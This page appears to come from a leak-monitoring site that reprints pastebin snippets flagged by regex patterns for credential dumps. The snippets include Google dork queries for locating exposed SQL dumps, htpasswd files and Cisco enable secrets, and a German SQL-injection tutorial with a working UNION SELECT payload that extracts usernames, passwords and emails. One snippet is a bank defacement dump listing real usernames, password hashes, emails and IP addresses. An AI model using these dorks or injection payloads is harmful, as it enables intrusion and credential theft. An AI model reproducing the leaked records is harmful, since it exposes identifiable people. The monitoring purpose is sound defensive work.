LeakedIn Logo
Stories About Data Leaks and Related Stuff

Posts Tagged ‘Login/Password List’

Potential leak of data: Login/Password List

5 votedvote

Detected 1 occurrence(s) of ‘username[ \t:]+password[ \t:]+email’:

SER SSHHOSTKEYS
filetype:sql "insert into" (pass|passwd|password)
filetype:sql ("values * MD5" | "values * password" | "values * encrypt")
filetype:sql +"IDENTIFIED BY" -cvs
filetype:sql password
filetype:url +inurl:"ftp://" +inurl:";@"
filetype:xls username password email
htpasswd
htpasswd / htgroup
htpasswd / htpasswd.bak
intext:"enable password 7"
intext:"enable secret 5 $"
intext:"EZGuestbook"
intext:"Web Wiz Journal"
intitle:"index of" intext:connect.inc
intitle:"index of" intext:globals.inc
intitle:"Index of

Detected 1 occurrence(s) of ‘enable secret’:

d" | "values * encrypt")
filetype:sql +"IDENTIFIED BY" -cvs
filetype:sql password
filetype:url +inurl:"ftp://" +inurl:";@"
filetype:xls username password email
htpasswd
htpasswd / htgroup
htpasswd / htpasswd.bak
intext:"enable password 7"
intext:"enable secret 5 $"
intext:"EZGuestbook"
intext:"Web Wiz Journal"
intitle:"index of" intext:connect.inc
intitle:"index of" intext:globals.inc
intitle:"Index of" passwords modified
intitle:"Index of" sc_serv.conf sc_serv content
intitle:"phpinfo()" +"mysql.default

Source: pastebin.com/raw.php?i=u3S8biWX

Potential leak of data: Login/Password List

1 votedvote

Detected 1 occurrence(s) of ‘username[ \t:]+password[ \t:]+email’:

zu benutzten. Das sieht dann so aus:

http://www.site.de/news.php?id=-5 /**/UNION/**/SELECT/**/1,concat_ws(0x3a,username,password,email),3/**/FROM/**/users/*

Vorraussetzung ist, dass der Column eMail auch existiert.
Die Ausgabe sieht dann so aus:

Username:Password:eMail

Da es noch was wegen dem “and” gab.

http://www.site.de/news.php?id=5 and 1 = 0

Das and 1 = 0 fragt hier ob 1 = 0 ist. Da 1 != 0 ist, ist das also Falsch (false) und daher sollte wenn etwas vuln ist, auf der Page inhaltlich etwas fehlen oder eben 

Source: pastebin.com/raw.php?i=yFbpDvVZ

Potential leak of data: Login/Password List

1 votedvote

Detected 1 occurrence(s) of ‘username[ \t:]+password[ \t:]+email’:

bl_products 	
tbl_promotions 	
tbl_qualifications 	
tbl_regions 	
tbl_reports 	
tbl_search 	
tbl_sections 	
tbl_settings 	
tbl_shareholders 	
tbl_socialresponsibility 	
tbl_testimonies 	
tbl_users
Table: 	tbl_users
Total Rows: 	3

login_ip 	username 	password 	email
41.222.234.6 	regina.agyare 	24e32ad919445843e9ad899866ddb551 	info@infosapplabs.com
41.202.16.138 	iamdatiam 	fbac760679353cf2c4a153dc01a57ed4 	d.dombadoh@gmail.com
41.222.234.6 	treasury 	93bb9d1129af08e535130bbf7a6e9459 	admintreasury@infosapplabs.c

Detected 1 occurrence(s) of ‘[hH][aA4][cC][kK][eE3][dD] [bB][yY]’:

                www.fidelitybank.com.gh hacked by Rwandan hackers 
                      http://rwandan-hackers.blogspot.fr
                            TWITTER:@rwandanhackers
 
=================================================================

Target: http://www.fidelitybank.com.gh/
Host IP:184.1

Source: pastebin.com/raw.php?i=Hbvq0UrU

Potential leak of data: Login/Password List

1 votedvote

Detected 1 occurrence(s) of ‘username[ \t:]+password[ \t:]+email’:

=============
 - DaviantDigital - 
=======================================================

     Vulnerable link: 
      Injection used: 
     
         Dumped rows: X
        Size of dump: 

=======================================================
 Format(USERNAME:PASSWORD:EMAIL)
=======================================================

=======================================================
      - Don't underestimate, don't expect mercy -
=======================================================

Source: pastebin.com/raw.php?i=g4Pf9qW6

Potential leak of data: Login/Password List

0 votedvote

Detected 1 occurrence(s) of ‘username[ \t:]+password[ \t:]+email’:

=============
 - DaviantDigital - 
=======================================================

     Vulnerable link: 
      Injection used: 
     
         Dumped rows: X
        Size of dump: 

=======================================================
 Format(USERNAME:PASSWORD:EMAIL)
=======================================================

=======================================================
      - Don't underestimate, don't expect mercy -
=======================================================

Source: pastebin.com/raw.php?i=DPrZqwDz